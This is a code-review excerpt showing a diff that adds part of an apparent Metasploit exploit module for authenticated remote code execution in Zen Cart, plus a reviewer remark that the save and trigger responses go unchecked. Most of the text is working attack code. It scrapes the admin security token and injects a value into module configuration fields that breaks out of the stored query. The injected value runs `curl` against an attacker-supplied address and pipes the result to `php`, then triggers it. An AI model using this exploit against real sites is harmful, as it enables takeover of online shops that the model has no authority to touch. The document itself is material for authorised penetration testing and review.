modules/exploits/linux/http/zencart_authenticated_rce.rb

```diff
@@ -0,0 +1,205 @@
+    res = send_request_cgi('method' => 'GET',
+                           'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php'),
+                           'vars_get' => {
+                             'cmd' => 'modules',
+                             'set' => datastore['MODULE'],
+                             'module' => datastore['SETTING'],
+                             'action' => 'edit'
+                           },
+                           'cookie' => @cookie)
+    if res.code != 200
+      fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
+    end
+    # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
+    if res && res.code == 200
+      @formtoken = res.body.scan(%r{<input type="hidden" name="securityToken" value="(.*)" />}).flatten[0] || ''
+      if @formtoken.empty?
+        fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
+      end
+      # print_good(@formtoken)
+      # <form name="modules"
+      @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
+      @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
+      @textarr = res.body.scan(%r{<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" />})
+      print_good(@textarr.to_s)
+      @secme = {}
+      @secme['securityToken'] = @formtoken
+      for @a in @radiolar
+        @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
+      end
+      for @a in @selectler
+        @secme["configuration[#{@a[0]}]"] = '0'
+      end
+      for @a in @textarr
+        @secme["configuration[#{@a[0]}]"] = '0'
+      end
+      print_good(@secme.to_s)
+      saverequest = send_request_cgi('method' => 'POST',
+                                     'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php'),
+                                     'cookie' => @cookie,
+                                     'vars_get' => {
+                                       'cmd' => 'modules',
+                                       'set' => datastore['MODULE'],
+                                       'module' => datastore['SETTING'],
+                                       'action' => 'save'
+                                     },
+                                     'vars_post' => @secme)
+
+      trigrequest = send_request_cgi('method' => 'GET',
+                                     'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php'),
+                                     'vars_get' => {
+                                       'cmd' => 'modules',
+                                       'set' => datastore['MODULE'],
+                                       'module' => datastore['SETTING'],
+                                       'action' => 'edit'
+                                     },
+                                     'cookie' => @cookie)
```

Comment:
The values are never checked. Presumably the `saverequest` and `trigrequest` responses should be checked to see if the request was successful.